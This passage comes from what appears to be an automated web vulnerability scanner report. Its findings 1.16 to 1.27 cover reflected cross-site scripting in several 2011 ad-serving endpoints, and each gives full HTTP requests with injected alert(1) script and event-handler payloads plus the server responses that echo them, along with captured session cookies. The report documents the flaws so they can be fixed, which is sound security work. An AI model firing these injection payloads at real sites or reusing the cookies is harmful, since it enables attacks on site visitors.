Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=979573a436'-alert(1)-'1e02b24949&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2145
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:31 GMT
Expires: Tue, 08 Feb 2011 02:37:31 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c0/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B
...[SNIP]...
00/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=979573a436'-alert(1)-'1e02b24949&_pn=17097094&redirect=;ord=7530561?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>
...[SNIP]...

1.16. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_pn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de550'-alert(1)-'03ca2570388 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094de550'-alert(1)-'03ca2570388&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:32 GMT
Expires: Tue, 08 Feb 2011 02:37:32 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B
...[SNIP]...
3841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094de550'-alert(1)-'03ca2570388&redirect=;ord=7531530?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>
...[SNIP]...

1.17. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a2c1'-alert(1)-'16f489b5f1f was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=09a2c1'-alert(1)-'16f489b5f1f&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:29 GMT
Expires: Tue, 08 Feb 2011 02:37:29 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=09a2c1'-alert(1)-'16f489b5f1f&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=7528515?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>
...[SNIP]...

1.18. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac8bd'-alert(1)-'8cff4cbdcbd was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=ac8bd'-alert(1)-'8cff4cbdcbd HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2112
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:33 GMT
Expires: Tue, 08 Feb 2011 02:37:33 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/7/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B
...[SNIP]...
453841/40471628/1%3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=ac8bd'-alert(1)-'8cff4cbdcbd;ord=7532561?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>
...[SNIP]...

1.19. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94136'-alert(1)-'b9a6d1d5de1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb94136'-alert(1)-'b9a6d1d5de1&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:24 GMT
Expires: Tue, 08 Feb 2011 02:37:24 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb94136'-alert(1)-'b9a6d1d5de1&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=7523546?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLL
...[SNIP]...

1.20. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e51c'-alert(1)-'aa9ea0b725b was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=1939e51c'-alert(1)-'aa9ea0b725b&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfw)lg>By]-!h!'>_I$udMi:J<T#zJGib(!P*.RI<FKCnDh[uiT+^/2+eMLsoLb?^Dz+yufH7FWQ6/y8I42VHJ.4%+m=^T>-w#L5HjI=M>tS[B>RcnZ6T2lhKM#(w`kYnh]me8IXe<5$$-@o]FbRGN4@X`e`DiynIifj/x<.eMm_t-^T04B.3!87!=A6$`NN8QhJOdb'5%5[A9*=.@8!//wVWE<i:qf:041WiCRg7?`HN2w_^'Xbp6xqG!u(<ik8pm.eE*)cs4WekRnp.N6`Ow-_#nZljbUQhxpwPR2Z!$DZRf)pVH%0<JHBTE1(`9dJBRY#aMIZk?1qXe%-/hhrqWm%1fdRw3L6.X?M^VlzaV^AjhXisNEMf$D-E:>Ac%)^QgDi:2Pu3$hFNE'kc?8O^NJGs5W1X9/U50IrgTb9y*5GJDkg9^w1QF/iXp`p=EKk8^l$T93mFdiq%`MJ*1r@rU><qp_)Lf'BDvLSe`Hdb)O2uaBL>yo/rlKJh6r'._tK2vZ!ADROTU4`e

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 09-Feb-2011 02:09:39 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 09-May-2011 02:09:39 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Tue, 08 Feb 2011 02:09:39 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=1939e51c'-alert(1)-'aa9ea0b725b&external_user_id=4760492999213801733&expiration=0" width="0" height="0"/>');

1.21. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3994c'-alert(1)-'0d2a8bddf42 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match3994c'-alert(1)-'0d2a8bddf42 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfw)lg>By]-!h!'>_I$udMi:J<T#zJGib(!P*.RI<FKCnDh[uiT+^/2+eMLsoLb?^Dz+yufH7FWQ6/y8I42VHJ.4%+m=^T>-w#L5HjI=M>tS[B>RcnZ6T2lhKM#(w`kYnh]me8IXe<5$$-@o]FbRGN4@X`e`DiynIifj/x<.eMm_t-^T04B.3!87!=A6$`NN8QhJOdb'5%5[A9*=.@8!//wVWE<i:qf:041WiCRg7?`HN2w_^'Xbp6xqG!u(<ik8pm.eE*)cs4WekRnp.N6`Ow-_#nZljbUQhxpwPR2Z!$DZRf)pVH%0<JHBTE1(`9dJBRY#aMIZk?1qXe%-/hhrqWm%1fdRw3L6.X?M^VlzaV^AjhXisNEMf$D-E:>Ac%)^QgDi:2Pu3$hFNE'kc?8O^NJGs5W1X9/U50IrgTb9y*5GJDkg9^w1QF/iXp`p=EKk8^l$T93mFdiq%`MJ*1r@rU><qp_)Lf'BDvLSe`Hdb)O2uaBL>yo/rlKJh6r'._tK2vZ!ADROTU4`e

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 09-Feb-2011 02:09:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 09-May-2011 02:09:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Tue, 08 Feb 2011 02:09:51 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match3994c'-alert(1)-'0d2a8bddf42?admeld_adprovider_id=193&external_user_id=4760492999213801733&expiration=0" width="0" height="0"/>');

1.22. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload bc86f<script>alert(1)</script>71f7e59fb6 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1506171&pid=871775bc86f<script>alert(1)</script>71f7e59fb6&ps=-1&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post&metakw=breaking%20news,headline%20news,current%20news,late%20breaking%20news,current%20news%20events HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:08:42 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2508


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "871775bc86f<script>alert(1)</script>71f7e59fb6"

   
                                                           </head>
...[SNIP]...

1.23. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 48b92--><script>alert(1)</script>af79d177dbe was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=150617148b92--><script>alert(1)</script>af79d177dbe&pid=871775&ps=-1&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post&metakw=breaking%20news,headline%20news,current%20news,late%20breaking%20news,current%20news%20events HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:08:29 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3351


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "150617148b92--><script>alert(1)</script>af79d177dbe" -->
...[SNIP]...

1.24. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload e0894--><script>alert(1)</script>92409ecc7b8 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1506171&pid=871775&ps=-1e0894--><script>alert(1)</script>92409ecc7b8&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post&metakw=breaking%20news,headline%20news,current%20news,late%20breaking%20news,current%20news%20events HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:08:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3790


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1e0894--><script>alert(1)</script>92409ecc7b8" -->
   
...[SNIP]...

1.25. http://ads.adxpose.com/ads/ads.js [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload a4738<script>alert(1)</script>f88ad01177e was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=M6uzDYEbWGBrvdnp_69536a4738<script>alert(1)</script>f88ad01177e HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2; JSESSIONID=FE63B20AA109FA6FB60FDC6E14F5F959

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A7A2A3A6B39BC5D8BC3D5B6D17528BD6; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:46:29 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
OSE_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_M6uzDYEbWGBrvdnp_69536a4738<script>alert(1)</script>f88ad01177e".replace(/[^\w\d]/g,""),"M6uzDYEbWGBrvdnp_69536a4738<script>
...[SNIP]...

1.26. http://ads.adxpose.com/ads/tag.js [altbannerurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/tag.js

Issue detail

The value of the altbannerurl request parameter is copied into the HTML document as plain text between tags. The payload 7b7f7<img%20src%3da%20onerror%3dalert(1)>865d86afc07 was submitted in the altbannerurl parameter. This input was echoed as 7b7f7<img src=a onerror=alert(1)>865d86afc07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536&cid=EI9-DR-Interclick&vchannel=9075&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D17b7f7<img%20src%3da%20onerror%3dalert(1)>865d86afc07 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=912E69DD8FDBA27C540045C338568E80; Path=/
Content-Type: text/javascript;charset=UTF-8
Content-Length: 730
Date: Tue, 08 Feb 2011 02:46:44 GMT
Connection: close

__ADXPOSE_PREFS__ = {"uid":"M6uzDYEbWGBrvdnp_69536","altbannerurl":"http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D51%26b%3D9075%26cid%3D7645468%26isif%3Df%26rurld%3Dwww.nypost.com%26sl%3Dtrue%26dvp%3Dhttp%253A%2F%2Fwww.nypost.com%2F%26rurl%3Dhttp%253A%252F%252Fwww.nypost.com%252F%26blkAdxp%3D17b7f7<img src=a onerror=alert(1)>865d86afc07","override":true,"vchannel":"9075","cid":"EI9-DR-Interclick","version":2};
document.write('<scr'+'ipt src="http://ads.adxpose.com/ads/ads.js?uid='+encodeURIComponent('M6uzDYEbWGBrvdnp_69536')+'" type=
...[SNIP]...

1.27. http://ads.adxpose.com/ads/tag.js [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/tag.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 86d9f<img%20src%3da%20onerror%3dalert(1)>fcea5a88802 was submitted in the cid parameter. This input was echoed as 86d9f<img src=a onerror=alert(1)>fcea5a88802 in the application's response.

